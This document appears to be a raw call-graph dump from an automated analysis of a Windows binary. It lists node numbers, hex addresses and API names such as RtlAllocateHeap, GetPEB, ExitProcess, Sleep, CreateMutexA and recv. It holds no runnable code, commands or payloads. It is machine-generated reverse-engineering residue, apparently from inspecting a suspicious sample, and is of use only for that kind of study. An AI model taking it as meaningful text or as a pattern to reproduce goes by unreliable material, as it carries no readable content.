RtlAllocateHeap 10530->10531 10532 648603 10531->10532 10532->10461 10537 648586 10533->10537 10534 6475f6 __dosmaperr RtlAllocateHeap 10535 64858f 10534->10535 10536 646c5a __cftof RtlAllocateHeap 10535->10536 10538 64859a 10536->10538 10537->10534 10537->10538 10538->10461 10541 648433 10539->10541 10540 648465 10547 64845e 10540->10547 10585 64779f 10540->10585 10541->10540 10542 64844e 10541->10542 10543 6475f6 __dosmaperr RtlAllocateHeap 10542->10543 10544 648453 10543->10544 10545 646c5a __cftof RtlAllocateHeap 10544->10545 10545->10547 10547->10461 10549 64825a 10548->10549 10550 64779f RtlAllocateHeap 10549->10550 10551 648297 10550->10551 10598 64d3c8 10551->10598 10553 64830d 10553->10461 10553->10553 10555 648420 RtlAllocateHeap 10554->10555 10556 64861b 10555->10556 10556->10461 10558 64875d std::invalid_argument::invalid_argument 10557->10558 10560 648707 10557->10560 10558->10463 10559 64c88e __cftof 4 API calls 10559->10560 10560->10558 10560->10559 10564 64c733 10561->10564 10565 64c743 10564->10565 10566 64c781 10565->10566 10567 64c76d 10565->10567 10576 64c748 10565->10576 10569 64690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10566->10569 10568 6475f6 __dosmaperr RtlAllocateHeap 10567->10568 10570 64c772 10568->10570 10571 64c78c 10569->10571 10573 646c5a __cftof RtlAllocateHeap 10570->10573 10572 64c79c 10571->10572 10577 64c7c8 __cftof 10571->10577 10574 652b7d __cftof RtlAllocateHeap 10572->10574 10573->10576 10575 64c7b1 10574->10575 10575->10576 10579 6475f6 __dosmaperr RtlAllocateHeap 10575->10579 10576->10526 10581 64c7de __cftof 10577->10581 10584 64c815 __cftof 10577->10584 10578 6475f6 __dosmaperr RtlAllocateHeap 10578->10576 10579->10576 10580 6475f6 __dosmaperr RtlAllocateHeap 10582 64c87f 10580->10582 10581->10576 10581->10578 10583 646c5a __cftof RtlAllocateHeap 10582->10583 10583->10576 10584->10576 10584->10580 10586 6477b4 10585->10586 10587 6477c3 10585->10587 10588 6475f6 __dosmaperr RtlAllocateHeap 10586->10588 10589 6477b9 10587->10589 10590 64b04b __cftof RtlAllocateHeap 10587->10590 10588->10589 10589->10547 10591 6477ea 10590->10591 10594 647801 10591->10594 10595 647a33 10591->10595 10593 64adf5 ___free_lconv_mon RtlAllocateHeap 10593->10589 10594->10593 10596 64adf5 ___free_lconv_mon RtlAllocateHeap 10595->10596 10597 647a42 10596->10597 10597->10594 10599 64d3ee 10598->10599 10600 64d3d8 10598->10600 10599->10600 10604 64d400 10599->10604 10601 6475f6 __dosmaperr RtlAllocateHeap 10600->10601 10602 64d3dd 10601->10602 10603 646c5a __cftof RtlAllocateHeap 10602->10603 10612 64d3e7 10603->10612 10605 64d439 10604->10605 10607 64d467 10604->10607 10619 64d2ff 10605->10619 10606 64d485 10610 64d4e4 10606->10610 10611 64d4ae 10606->10611 10607->10606 10608 64d48a 10607->10608 10624 64cbdf 10608->10624 10652 64cef8 10610->10652 10613 64d4b3 10611->10613 10614 64d4cc 10611->10614 10612->10553 10635 64d23e 10613->10635 10645 64d0e2 10614->10645 10620 64d315 10619->10620 10621 64d320 10619->10621 10620->10612 10622 64a1f1 ___std_exception_copy RtlAllocateHeap 10621->10622 10623 64d37b __cftof 10622->10623 10623->10612 10625 64cbf1 10624->10625 10626 64690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10625->10626 10627 64cc05 10626->10627 10628 64cc21 10627->10628 10629 64cc0d 10627->10629 10631 64cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10628->10631 10634 64cc1c __alldvrm __cftof _strrchr 10628->10634 10630 6475f6 __dosmaperr RtlAllocateHeap 10629->10630 10632 64cc12 10630->10632 10631->10634 10633 646c5a __cftof RtlAllocateHeap 10632->10633 10633->10634 10634->10612 10636 6531a8 RtlAllocateHeap 10635->10636 10637 64d26c 10636->10637 10638 652c47 RtlAllocateHeap 10637->10638 10639 64d29e 10638->10639 10640 64d2de 10639->10640 10642 64d2b7 10639->10642 10643 64d2a5 10639->10643 10641 64cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10640->10641 10641->10643 10644 64d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10642->10644 10643->10612 10644->10643 10646 6531a8 RtlAllocateHeap 10645->10646 10647 64d10f 10646->10647 10648 652c47 RtlAllocateHeap 10647->10648 10649 64d147 10648->10649 10650 64d14e 10649->10650 10651 64d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10649->10651 10650->10612 10651->10650 10653 64cf10 10652->10653 10654 6531a8 RtlAllocateHeap 10653->10654 10655 64cf29 10654->10655 10656 652c47 RtlAllocateHeap 10655->10656 10657 64cf6e 10656->10657 10658 64cf75 10657->10658 10659 64cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10657->10659 10658->10612 10659->10658 10661 619080 10660->10661 10662 627a00 RtlAllocateHeap 10661->10662 10663 61908f 10662->10663 10664 615c10 4 API calls 10663->10664 10665 61909a 10664->10665 10666 6280c0 RtlAllocateHeap 10665->10666 10667 6190ec 10666->10667 10668 628220 RtlAllocateHeap 10667->10668 10669 6190fe shared_ptr 10668->10669 10670 61917e shared_ptr std::invalid_argument::invalid_argument 10669->10670 10671 646c6a RtlAllocateHeap 10669->10671 10670->10196 10672 6191aa 10671->10672 10674 628292 10673->10674 10675 628248 10673->10675 10678 628f40 RtlAllocateHeap 10674->10678 10680 6282a1 10674->10680 10675->10674 10676 628251 10675->10676 10702 629280 10676->10702 10678->10680 10679 62825a 10679->10200 10680->10200 10682 628f6b 10681->10682 10683 62908e 10681->10683 10687 628fb2 10682->10687 10688 628fdc 10682->10688 10684 629270 RtlAllocateHeap 10683->10684 10685 629093 10684->10685 10686 612480 RtlAllocateHeap 10685->10686 10694 628fc3 __cftof 10686->10694 10687->10685 10689 628fbd 10687->10689 10690 62d3e2 RtlAllocateHeap 10688->10690 10688->10694 10692 62d3e2 RtlAllocateHeap 10689->10692 10690->10694 10691 646c6a RtlAllocateHeap 10693 62909d 10691->10693 10692->10694 10695 612480 Concurrency::cancel_current_task 10693->10695 10696 6290b8 10693->10696 10699 6290be 10693->10699 10694->10691 10697 62904c shared_ptr __cftof 10694->10697 10700 6438af ___std_exception_copy RtlAllocateHeap 10695->10700 10698 62d3e2 RtlAllocateHeap 10696->10698 10697->10189 10698->10699 10699->10189 10701 6124c3 10700->10701 10701->10189 10703 629294 10702->10703 10706 6292a5 __cftof 10703->10706 10707 6294e0 10703->10707 10705 62932b 10705->10679 10706->10679 10708 62950b 10707->10708 10709 629619 10707->10709 10713 629552 10708->10713 10714 629579 10708->10714 10710 629270 RtlAllocateHeap 10709->10710 10711 62961e 10710->10711 10712 612480 RtlAllocateHeap 10711->10712 10721 629563 __cftof 10712->10721 10713->10711 10715 62955d 10713->10715 10718 62d3e2 RtlAllocateHeap 10714->10718 10714->10721 10717 62d3e2 RtlAllocateHeap 10715->10717 10716 646c6a RtlAllocateHeap 10719 629628 shared_ptr 10716->10719 10717->10721 10718->10721 10719->10705 10720 6295e1 shared_ptr __cftof 10720->10705 10721->10716 10721->10720 10722 646a44 10723 646a52 10722->10723 10724 646a5c 10722->10724 10735 64b655 10723->10735 10740 64698d 10724->10740 10727 646a59 10728 646a76 10743 6468ed 10728->10743 10731 646a8a 10733 646aa8 10731->10733 10734 64adf5 ___free_lconv_mon RtlAllocateHeap 10731->10734 10732 64b655 RtlAllocateHeap 10732->10731 10734->10733 10736 64b662 10735->10736 10737 64b679 10736->10737 10746 6475c0 10736->10746 10737->10727 10741 64690a __cftof 4 API calls 10740->10741 10742 64699f 10741->10742 10742->10728 10754 64683b 10743->10754 10751 6475e3 10746->10751 10748 6475cb __dosmaperr 10749 6475f6 __dosmaperr RtlAllocateHeap 10748->10749 10750 6475de 10749->10750 10750->10727 10752 64a7c8 __dosmaperr RtlAllocateHeap 10751->10752 10753 6475e8 10752->10753 10753->10748 10755 646863 10754->10755 10756 646849 10754->10756 10758 646889 __cftof 10755->10758 10759 64686a 10755->10759 10767 6469cc 10756->10767 10762 64689f __cftof 10758->10762 10763 6469e6 RtlAllocateHeap 10758->10763 10760 646853 10759->10760 10771 6469e6 10759->10771 10760->10731 10760->10732 10762->10760 10764 6475c0 __dosmaperr RtlAllocateHeap 10762->10764 10763->10762 10765 6468ab 10764->10765 10766 6475f6 __dosmaperr RtlAllocateHeap 10765->10766 10766->10760 10768 6469d7 10767->10768 10770 6469df 10767->10770 10769 64adf5 ___free_lconv_mon RtlAllocateHeap 10768->10769 10769->10770 10770->10760 10772 6469cc RtlAllocateHeap 10771->10772 10773 6469f4 10772->10773 10776 646a25 10773->10776 10777 64b04b __cftof RtlAllocateHeap 10776->10777 10778 646a05 10777->10778 10778->10760 10830 613440 10835 612b30 10830->10835 10832 61344f Concurrency::cancel_current_task 10833 6438af ___std_exception_copy RtlAllocateHeap 10832->10833 10834 613483 10833->10834 10836 6438af ___std_exception_copy RtlAllocateHeap 10835->10836 10837 612b68 std::invalid_argument::invalid_argument 10836->10837 10837->10832 10817 613840 10818 6138f6 10817->10818 10820 61385f 10817->10820 10819 613920 10827 6291e0 10819->10827 10820->10818 10820->10819 10822 6138cd shared_ptr 10820->10822 10825 61391b 10820->10825 10824 627d50 RtlAllocateHeap 10822->10824 10823 613925 10824->10818 10826 646c6a RtlAllocateHeap 10825->10826 10826->10819 10828 62c1b9 RtlAllocateHeap 10827->10828 10829 6291ea 10828->10829 10829->10823 10843 613c47 10844 613c51 10843->10844 10847 613c5f 10844->10847 10859 6132d0 10844->10859 10845 613c68 10847->10845 10878 613810 10847->10878 10882 62c6ac 10859->10882 10861 61336b 10888 62c26a 10861->10888 10864 61333c __Mtx_unlock 10865 62c26a 5 API calls 10864->10865 10867 613350 std::invalid_argument::invalid_argument 10864->10867 10868 613377 10865->10868 10866 613314 10866->10861 10866->10864 10885 62bd4c 10866->10885 10867->10847 10869 62c6ac GetSystemTimePreciseAsFileTime 10868->10869 10870 6133af 10869->10870 10871 62c26a 5 API calls 10870->10871 10872 6133b6 __Cnd_broadcast 10870->10872 10871->10872 10873 62c26a 5 API calls 10872->10873 10874 6133d7 __Mtx_unlock 10872->10874 10873->10874 10875 62c26a 5 API calls 10874->10875 10876 6133eb 10874->10876 10877 61340e 10875->10877 10876->10847 10877->10847 10879 61381c 10878->10879 10961 612440 10879->10961 10892 62c452 10882->10892 10884 62c6b9 10884->10866 10909 62bb72 10885->10909 10887 62bd5c 10887->10866 10889 62c292 10888->10889 10890 62c274 10888->10890 10889->10889 10890->10889 10915 62c297 10890->10915 10893 62c4a8 10892->10893 10895 62c47a std::invalid_argument::invalid_argument 10892->10895 10893->10895 10898 62cf6b 10893->10898 10895->10884 10896 62c4fd __Xtime_diff_to_millis2 10896->10895 10897 62cf6b _xtime_get GetSystemTimePreciseAsFileTime 10896->10897 10897->10896 10899 62cf7a 10898->10899 10901 62cf87 __aulldvrm 10898->10901 10899->10901 10902 62cf44 10899->10902 10901->10896 10905 62cbea 10902->10905 10906 62cc07 10905->10906 10907 62cbfb GetSystemTimePreciseAsFileTime 10905->10907 10906->10901 10907->10906 10910 62bb9c 10909->10910 10911 62cf6b _xtime_get GetSystemTimePreciseAsFileTime 10910->10911 10914 62bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 10910->10914 10912 62bbcf __Xtime_diff_to_millis2 10911->10912 10913 62cf6b _xtime_get GetSystemTimePreciseAsFileTime 10912->10913 10912->10914 10913->10914 10914->10887 10920 612ae0 10915->10920 10917 62c2ae 10927 62c1ff 10917->10927 10919 62c2bf Concurrency::cancel_current_task 10921 62bedf InitOnceExecuteOnce 10920->10921 10922 612af4 __dosmaperr 10921->10922 10922->10917 10923 64a671 __cftof 4 API calls 10922->10923 10926 646ccc 10923->10926 10924 648bec __cftof 4 API calls 10925 646cf6 10924->10925 10926->10924 10928 62c20b __EH_prolog3_GS 10927->10928 10929 6280c0 RtlAllocateHeap 10928->10929 10930 62c23d 10929->10930 10935 6126b0 10930->10935 10932 62c252 10952 627970 10932->10952 10934 62c25a 10934->10919 10936 627a00 RtlAllocateHeap 10935->10936 10937 612702 10936->10937 10938 612725 10937->10938 10939 628f40 RtlAllocateHeap 10937->10939 10940 628f40 RtlAllocateHeap 10938->10940 10941 61278e 10938->10941 10939->10938 10940->10941 10942 6127ed shared_ptr 10941->10942 10944 6128b8 10941->10944 10943 6438af ___std_exception_copy RtlAllocateHeap 10942->10943 10947 61284b 10943->10947 10946 646c6a RtlAllocateHeap 10944->10946 10945 61287a shared_ptr std::invalid_argument::invalid_argument 10945->10932 10946->10947 10947->10945 10948 646c6a RtlAllocateHeap 10947->10948 10949 6128c2 10948->10949 10957 643912 10949->10957 10951 6128e5 shared_ptr 10951->10932 10953 62797b 10952->10953 10954 627996 shared_ptr 10952->10954 10953->10954 10955 646c6a RtlAllocateHeap 10953->10955 10954->10934 10956 6279ba 10955->10956 10958 643926 10957->10958 10959 64391f 10957->10959 10958->10951 10960 648ba3 ___std_exception_copy RtlAllocateHeap 10959->10960 10960->10958 10964 62b5d6 10961->10964 10963 612472 10967 62b5f1 Concurrency::cancel_current_task 10964->10967 10965 62b658 __cftof std::invalid_argument::invalid_argument 10965->10963 10966 648bec __cftof 4 API calls 10968 62b69f 10966->10968 10967->10965 10967->10966 10974 62be50 10977 62bd8b 10974->10977 10976 62be66 Concurrency::cancel_current_task std::_Throw_future_error 10978 6122e0 std::invalid_argument::invalid_argument RtlAllocateHeap 10977->10978 10979 62bd9f 10978->10979 10979->10976 9681 61a856 9682 61a870 9681->9682 9683 61a892 shared_ptr 9681->9683 9682->9683 9684 61a94e 9682->9684 9690 6280c0 9683->9690 9686 61a953 Sleep CreateMutexA 9684->9686 9705 646c6a 9684->9705 9689 61a98e 9686->9689 9688 61a903 9693 6280de 9690->9693 9695 628104 9690->9695 9691 6281ee 9713 629270 9691->9713 9693->9688 9694 6281f3 9716 612480 9694->9716 9695->9691 9696 628158 9695->9696 9697 62817d 9695->9697 9696->9694 9708 62d3e2 9696->9708 9701 62d3e2 RtlAllocateHeap 9697->9701 9703 628169 __cftof 9697->9703 9701->9703 9702 646c6a RtlAllocateHeap 9702->9691 9703->9702 9704 6281d0 shared_ptr 9703->9704 9704->9688 9706 646bf6 __cftof RtlAllocateHeap 9705->9706 9707 646c79 __cftof 9706->9707 9710 612480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9708->9710 9709 62d401 Concurrency::cancel_current_task 9709->9703 9710->9709 9720 6438af 9710->9720 9809 62c1b9 9713->9809 9717 61248e Concurrency::cancel_current_task 9716->9717 9718 6438af ___std_exception_copy RtlAllocateHeap 9717->9718 9719 6124c3 9718->9719 9721 6124c3 9720->9721 9722 6438bc ___std_exception_copy 9720->9722 9721->9703 9722->9721 9723 6438e9 9722->9723 9726 64a1f1 9722->9726 9735 648ba3 9723->9735 9727 64a1fe 9726->9727 9729 64a20c 9726->9729 9727->9729 9733 64a223 9727->9733 9738 6475f6 9729->9738 9730 64a214 9741 646c5a 9730->9741 9732 64a21e 9732->9723 9733->9732 9734 6475f6 __dosmaperr RtlAllocateHeap 9733->9734 9734->9730 9736 64adf5 ___free_lconv_mon RtlAllocateHeap 9735->9736 9737 648bbb 9736->9737 9737->9721 9744 64a7c8 9738->9744 9803 646bf6 9741->9803 9743 646c66 9743->9732 9745 64a7d2 __dosmaperr 9744->9745 9747 6475fb 9745->9747 9755 64d82f 9745->9755 9747->9730 9748 64a813 __dosmaperr 9749 64a853 9748->9749 9751 64a81b __dosmaperr 9748->9751 9763 64a49f 9749->9763 9759 64adf5 9751->9759 9754 64adf5 ___free_lconv_mon RtlAllocateHeap 9754->9747 9758 64d83c __dosmaperr 9755->9758 9756 64d867 RtlAllocateHeap 9757 64d87a __dosmaperr 9756->9757 9756->9758 9757->9748 9758->9756 9758->9757 9760 64ae00 9759->9760 9762 64ae1b __dosmaperr 9759->9762 9761 6475f6 __dosmaperr RtlAllocateHeap 9760->9761 9760->9762 9761->9762 9762->9747 9764 64a50d __dosmaperr 9763->9764 9767 64a445 9764->9767 9766 64a536 9766->9754 9768 64a451 __dosmaperr 9767->9768 9771 64a626 9768->9771 9770 64a473 __dosmaperr 9770->9766 9772 64a635 __cftof 9771->9772 9773 64a65c __cftof 9771->9773 9772->9773 9775 64f35f 9772->9775 9773->9770 9777 64f3df 9775->9777 9778 64f375 9775->9778 9776 64f4d0 __cftof RtlAllocateHeap 9779 64f43b 9776->9779 9780 64adf5 ___free_lconv_mon RtlAllocateHeap 9777->9780 9801 64f42d 9777->9801 9778->9777 9783 64f3a8 9778->9783 9786 64adf5 ___free_lconv_mon RtlAllocateHeap 9778->9786 9790 64f49b 9779->9790 9802 64adf5 RtlAllocateHeap ___free_lconv_mon 9779->9802 9781 64f401 9780->9781 9782 64adf5 ___free_lconv_mon RtlAllocateHeap 9781->9782 9784 64f414 9782->9784 9787 64adf5 ___free_lconv_mon RtlAllocateHeap 9783->9787 9800 64f3ca 9783->9800 9788 64adf5 ___free_lconv_mon RtlAllocateHeap 9784->9788 9785 64adf5 ___free_lconv_mon RtlAllocateHeap 9789 64f3d4 9785->9789 9791 64f39d 9786->9791 9792 64f3bf 9787->9792 9793 64f422 9788->9793 9794 64adf5 ___free_lconv_mon RtlAllocateHeap 9789->9794 9795 64adf5 ___free_lconv_mon RtlAllocateHeap 9790->9795 9796 64ef3c ___free_lconv_mon RtlAllocateHeap 9791->9796 9797 64f03a __cftof RtlAllocateHeap 9792->9797 9798 64adf5 ___free_lconv_mon RtlAllocateHeap 9793->9798 9794->9777 9799 64f4a1 9795->9799 9796->9783 9797->9800 9798->9801 9799->9773 9800->9785 9801->9776 9802->9779 9804 64a7c8 __dosmaperr RtlAllocateHeap 9803->9804 9806 646c01 __cftof 9804->9806 9805 646c0f 9805->9743 9806->9805 9807 646bf6 __cftof RtlAllocateHeap 9806->9807 9808 646c66 9807->9808 9808->9743 9812 62c123 9809->9812 9811 62c1ca Concurrency::cancel_current_task 9815 6122e0 9812->9815 9814 62c135 9814->9811 9816 6438af ___std_exception_copy RtlAllocateHeap 9815->9816 9817 612317 std::invalid_argument::invalid_argument 9816->9817 9817->9814 10993 611020 10994 6280c0 RtlAllocateHeap 10993->10994 10995 611031 10994->10995 10996 62d64e RtlAllocateHeap 10995->10996 10997 61103b 10996->10997 9818 64d82f 9821 64d83c __dosmaperr 9818->9821 9819 64d867 RtlAllocateHeap 9820 64d87a __dosmaperr 9819->9820 9819->9821 9821->9819 9821->9820 9822 646629 9825 6464c7 9822->9825 9827 6464d5 __cftof 9825->9827 9826 646520 9827->9826 9830 64652b 9827->9830 9829 64652a 9836 64a302 GetPEB 9830->9836 9832 646535 9833 64654a __cftof 9832->9833 9834 64653a GetPEB 9832->9834 9835 646562 ExitProcess 9833->9835 9834->9833 9837 64a31c __cftof 9836->9837 9837->9832 11078 611000 11079 62d64e RtlAllocateHeap 11078->11079 11080 61100a 11079->11080 11056 612e00 11057 612e28 11056->11057 11060 62c68b 11057->11060 11063 62c3d5 11060->11063 11062 612e33 11064 62c3e1 11063->11064 11065 62c3eb 11063->11065 11066 62c3be 11064->11066 11067 62c39e 11064->11067 11065->11062 11076 62cd0a 11066->11076 11067->11065 11072 62ccd5 11067->11072 11070 62c3d0 11070->11062 11073 62cce3 InitializeCriticalSectionEx 11072->11073 11074 62c3b7 11072->11074 11073->11074 11074->11062 11077 62cd1f RtlInitializeConditionVariable 11076->11077 11077->11070 11097 61a418 11098 61a420 shared_ptr 11097->11098 11099 61a93f 11098->11099 11102 61a4f3 shared_ptr 11098->11102 11100 646c6a RtlAllocateHeap 11099->11100 11101 61a944 11100->11101 11104 646c6a RtlAllocateHeap 11101->11104 11103 6280c0 RtlAllocateHeap 11102->11103 11105 61a903 11103->11105 11106 61a949 11104->11106 11107 61a94e 11106->11107 11108 646c6a RtlAllocateHeap 11106->11108 11109 61a953 Sleep CreateMutexA 11107->11109 11110 646c6a RtlAllocateHeap 11107->11110 11108->11107 11111 61a98e 11109->11111 11110->11109 11160 616ae9 11163 616b01 11160->11163 11161 6280c0 RtlAllocateHeap 11162 616bac 11161->11162 11164 629280 RtlAllocateHeap 11162->11164 11163->11161 11165 616bbd shared_ptr 11163->11165 11164->11165 11166 6280c0 RtlAllocateHeap 11165->11166 11167 616ce3 shared_ptr std::invalid_argument::invalid_argument 11166->11167 11168 629ef0 11169 629f0c 11168->11169 11170 62c68b __Mtx_init_in_situ 2 API calls 11169->11170 11171 629f17 11170->11171 11172 6544f2 11173 6544ff 11172->11173 11175 65450c 11172->11175 11174 6475f6 __dosmaperr RtlAllocateHeap 11173->11174 11177 654504 11174->11177 11176 6475f6 __dosmaperr RtlAllocateHeap 11175->11176 11178 654518 11175->11178 11179 654539 11176->11179 11180 646c5a __cftof RtlAllocateHeap 11179->11180 11180->11177 11196 612ec0 11197 612f06 11196->11197 11204 612f6f 11196->11204 11198 62c6ac GetSystemTimePreciseAsFileTime 11197->11198 11199 612f12 11198->11199 11201 612f1d 11199->11201 11202 61301e 11199->11202 11200 612fef 11206 62d3e2 RtlAllocateHeap 11201->11206 11208 612f30 __Mtx_unlock 11201->11208 11203 62c26a 5 API calls 11202->11203 11205 613024 11203->11205 11204->11200 11209 62c6ac GetSystemTimePreciseAsFileTime 11204->11209 11207 62c26a 5 API calls 11205->11207 11206->11208 11210 612fb9 11207->11210 11208->11204 11208->11205 11209->11210 11211 62c26a 5 API calls 11210->11211 11212 612fc0 __Mtx_unlock 11210->11212 11211->11212 11213 62c26a 5 API calls 11212->11213 11214 612fd8 __Cnd_broadcast 11212->11214 11213->11214 11214->11200 11215 62c26a 5 API calls 11214->11215 11216 61303c 11215->11216 11217 62c6ac GetSystemTimePreciseAsFileTime 11216->11217 11227 613080 shared_ptr __Mtx_unlock 11217->11227 11218 6131c5 11219 62c26a 5 API calls 11218->11219 11220 6131cb 11219->11220 11221 62c26a 5 API calls 11220->11221 11222 6131d1 11221->11222 11223 62c26a 5 API calls 11222->11223 11229 613193 __Mtx_unlock 11223->11229 11224 6131a7 std::invalid_argument::invalid_argument 11225 62c26a 5 API calls 11226 6131dd 11225->11226 11227->11218 11227->11220 11227->11224 11228 62c6ac GetSystemTimePreciseAsFileTime 11227->11228 11230 61315f 11228->11230 11229->11224 11229->11225 11230->11218 11230->11222 11230->11229 11231 62bd4c GetSystemTimePreciseAsFileTime 11230->11231 11231->11230 11237 61e0c0 recv 11238 61e122 recv 11237->11238 11239 61e157 recv 11238->11239 11241 61e191 11239->11241 11240 61e2b3 std::invalid_argument::invalid_argument 11241->11240 11242 62c6ac GetSystemTimePreciseAsFileTime 11241->11242 11243 61e2ee 11242->11243 11244 62c26a 5 API calls 11243->11244 11245 61e358 11244->11245 11271 62d0c7 11272 62d0d7 11271->11272 11273 62d17f 11272->11273 11274 62d17b RtlWakeAllConditionVariable 11272->11274 11275 619adc 11276 619aea 11275->11276 11280 619afe shared_ptr 11275->11280 11277 61a917 11276->11277 11276->11280 11278 61a953 Sleep CreateMutexA 11277->11278 11279 646c6a RtlAllocateHeap 11277->11279 11281 61a98e 11278->11281 11279->11278 11282 627a00 RtlAllocateHeap 11280->11282 11283 619b74 11282->11283 11284 615c10 4 API calls 11283->11284 11285 619b7c 11284->11285 11298 618b30 11285->11298 11287 619b8d 11288 628220 RtlAllocateHeap 11287->11288 11289 619b9c 11288->11289 11290 627a00 RtlAllocateHeap 11289->11290 11291 619ca9 11290->11291 11292 615c10 4 API calls 11291->11292 11293 619cb1 11292->11293 11294 618b30 4 API calls 11293->11294 11295 619cc2 11294->11295 11296 628220 RtlAllocateHeap 11295->11296 11297 619cd1 11296->11297 11299 618b7c 11298->11299 11300 627a00 RtlAllocateHeap 11299->11300 11301 618b8c 11300->11301 11302 615c10 4 API calls 11301->11302 11303 618b97 11302->11303 11304 6280c0 RtlAllocateHeap 11303->11304 11305 618be3 11304->11305 11306 6280c0 RtlAllocateHeap 11305->11306 11307 618c35 11306->11307 11308 628220 RtlAllocateHeap 11307->11308 11311 618c47 shared_ptr 11308->11311 11309 618d01 shared_ptr std::invalid_argument::invalid_argument 11309->11287 11310 646c6a RtlAllocateHeap 11312 618d2d 11310->11312 11311->11309 11311->11310 11313 627a00 RtlAllocateHeap 11312->11313 11314 618d8f 11313->11314 11315 615c10 4 API calls 11314->11315 11316 618d9a 11315->11316 11317 6280c0 RtlAllocateHeap 11316->11317 11318 618dec 11317->11318 11319 628220 RtlAllocateHeap 11318->11319 11321 618dfe shared_ptr 11319->11321 11320 618e7e shared_ptr std::invalid_argument::invalid_argument 11320->11287 11321->11320 11322 646c6a RtlAllocateHeap 11321->11322 11323 618eaa 11322->11323 11324 627a00 RtlAllocateHeap 11323->11324 11325 618f0f 11324->11325 11326 615c10 4 API calls 11325->11326 11327 618f1a 11326->11327 11328 6280c0 RtlAllocateHeap 11327->11328 11329 618f6c 11328->11329 11330 628220 RtlAllocateHeap 11329->11330 11332 618f7e shared_ptr 11330->11332 11331 618ffe shared_ptr std::invalid_argument::invalid_argument 11331->11287 11332->11331 11333 646c6a RtlAllocateHeap 11332->11333 11334 61902a 11333->11334 11370 6120a0 11371 62c68b __Mtx_init_in_situ 2 API calls 11370->11371 11372 6120ac 11371->11372 11373 62d64e RtlAllocateHeap 11372->11373 11374 6120b6 11373->11374 11375 6134a0 11376 6134ca shared_ptr 11375->11376 11377 6134aa 11375->11377 11377->11376 11378 646c6a RtlAllocateHeap 11377->11378 11379 6134f2 Concurrency::cancel_current_task shared_ptr 11378->11379 11385 615cad 11387 615caf 11385->11387 11386 615d17 shared_ptr std::invalid_argument::invalid_argument 11387->11386 11388 646c6a RtlAllocateHeap 11387->11388 11389 615d47 __cftof 11388->11389 11389->11389 11390 6280c0 RtlAllocateHeap 11389->11390 11392 615e3e 11390->11392 11391 615ea6 shared_ptr std::invalid_argument::invalid_argument 11392->11391 11393 646c6a RtlAllocateHeap 11392->11393 11394 615ed2 11393->11394 11395 615ffe shared_ptr std::invalid_argument::invalid_argument 11394->11395 11396 646c6a RtlAllocateHeap 11394->11396 11397 61601b 11396->11397 11398 6280c0 RtlAllocateHeap 11397->11398 11399 616089 11398->11399 11400 6280c0 RtlAllocateHeap 11399->11400 11401 6160bd 11400->11401 11402 6280c0 RtlAllocateHeap 11401->11402 11403 6160ee 11402->11403 11404 6280c0 RtlAllocateHeap 11403->11404 11405 61611f 11404->11405 11406 6280c0 RtlAllocateHeap 11405->11406 11408 616150 11406->11408 11407 6165b1 shared_ptr std::invalid_argument::invalid_argument 11408->11407 11409 646c6a RtlAllocateHeap 11408->11409 11410 6165dc 11409->11410 11411 627a00 RtlAllocateHeap 11410->11411 11412 6166a6 11411->11412 11413 615c10 4 API calls 11412->11413 11414 6166ac 11413->11414 11415 615c10 4 API calls 11414->11415 11416 6166b1 11415->11416 11417 6122c0 4 API calls 11416->11417 11418 6166c9 shared_ptr 11417->11418 11419 627a00 RtlAllocateHeap 11418->11419 11420 616732 11419->11420 11421 615c10 4 API calls 11420->11421 11422 61673d 11421->11422 11423 6122c0 4 API calls 11422->11423 11432 616757 shared_ptr 11423->11432 11424 616852 11425 6280c0 RtlAllocateHeap 11424->11425 11427 61689c 11425->11427 11426 627a00 RtlAllocateHeap 11426->11432 11428 6280c0 RtlAllocateHeap 11427->11428 11430 6168e3 shared_ptr std::invalid_argument::invalid_argument 11428->11430 11429 615c10 4 API calls 11429->11432 11431 6122c0 4 API calls 11431->11432 11432->11424 11432->11426 11432->11429 11432->11431 11433 6142b0 11436 613ac0 11433->11436 11435 6142bb shared_ptr 11437 613af9 11436->11437 11438 646c6a RtlAllocateHeap 11437->11438 11443 613b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11437->11443 11439 613be6 11438->11439 11440 6132d0 6 API calls 11439->11440 11442 613c38 11439->11442 11440->11442 11441 6132d0 6 API calls 11445 613c5f 11441->11445 11442->11441 11442->11445 11443->11435 11444 613c68 11444->11435 11445->11444 11446 613810 4 API calls 11445->11446 11447 613cdb 11446->11447 11448 627d50 RtlAllocateHeap 11447->11448 11449 613d52 11447->11449 11448->11449 11450 62d3e2 RtlAllocateHeap 11449->11450 11451 613d84 11450->11451 11452 627d50 RtlAllocateHeap 11451->11452 11454 613e03 11451->11454 11452->11454 11453 613e9b shared_ptr 11453->11435 11454->11453 11455 646c6a RtlAllocateHeap 11454->11455 11456 613ec1 11455->11456 11457 619ab8 11459 619acc 11457->11459 11460 619b08 11459->11460 11461 627a00 RtlAllocateHeap 11460->11461 11462 619b74 11461->11462 11463 615c10 4 API calls 11462->11463 11464 619b7c 11463->11464 11465 618b30 4 API calls 11464->11465 11466 619b8d 11465->11466 11467 628220 RtlAllocateHeap 11466->11467 11468 619b9c 11467->11468 11469 627a00 RtlAllocateHeap 11468->11469 11470 619ca9 11469->11470 11471 615c10 4 API calls 11470->11471 11472 619cb1 11471->11472 11473 618b30 4 API calls 11472->11473 11474 619cc2 11473->11474 11475 628220 RtlAllocateHeap 11474->11475 11476 619cd1 11475->11476 11517 628680 11518 6286e0 11517->11518 11518->11518 11526 627760 11518->11526 11520 6286f9 11521 628f40 RtlAllocateHeap 11520->11521 11522 628714 11520->11522 11521->11522 11523 628f40 RtlAllocateHeap 11522->11523 11525 628769 11522->11525 11524 6287b1 11523->11524 11527 627864 shared_ptr __cftof 11526->11527 11528 62777b 11526->11528 11527->11520 11528->11527 11529 6278f1 11528->11529 11532 627811 11528->11532 11533 6277ea 11528->11533 11539 6277fb __cftof 11528->11539 11530 629270 RtlAllocateHeap 11529->11530 11531 6278f6 11530->11531 11534 612480 RtlAllocateHeap 11531->11534 11537 62d3e2 RtlAllocateHeap 11532->11537 11532->11539 